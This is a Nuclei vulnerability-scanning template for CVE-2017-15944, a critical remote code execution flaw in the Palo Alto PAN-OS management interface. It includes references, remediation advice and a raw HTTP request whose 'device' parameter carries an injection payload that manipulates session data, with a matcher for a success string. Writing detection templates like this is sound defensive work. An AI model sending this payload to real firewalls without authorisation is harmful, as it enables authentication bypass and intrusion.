nuclei-templates/http/cves/2017/CVE-2017-15944.yaml

48 lines
1.7 KiB
YAML

id: CVE-2017-15944
info:
name: Palo Alto Network PAN-OS - Remote Code Execution
author: emadshanab,milo2012
severity: critical
description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
remediation: |
Apply the latest security patches and updates provided by Palo Alto Networks.
reference:
- https://www.exploit-db.com/exploits/43342
- https://security.paloaltonetworks.com/CVE-2017-15944
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-15944
- http://www.securitytracker.com/id/1040007
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-15944
epss-score: 0.97377
epss-percentile: 0.99876
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: paloaltonetworks
product: pan-os
tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect
http:
- raw:
- |
GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{randstr}};
matchers-condition: and
matchers:
- type: word
part: body
words:
- "@start@Success@end@"
- type: status
status:
- 200
# digest: 4a0a0047304502201fcdc28ad21d1be88b23a215c70bf512dd182888178757b27a68b190b9179823022100f041ce5cd49807c7b67f2784113149a632409ff1bfe02ebbb9ffedd6ef93613a:922c64590222798bb761d5b6d8e72950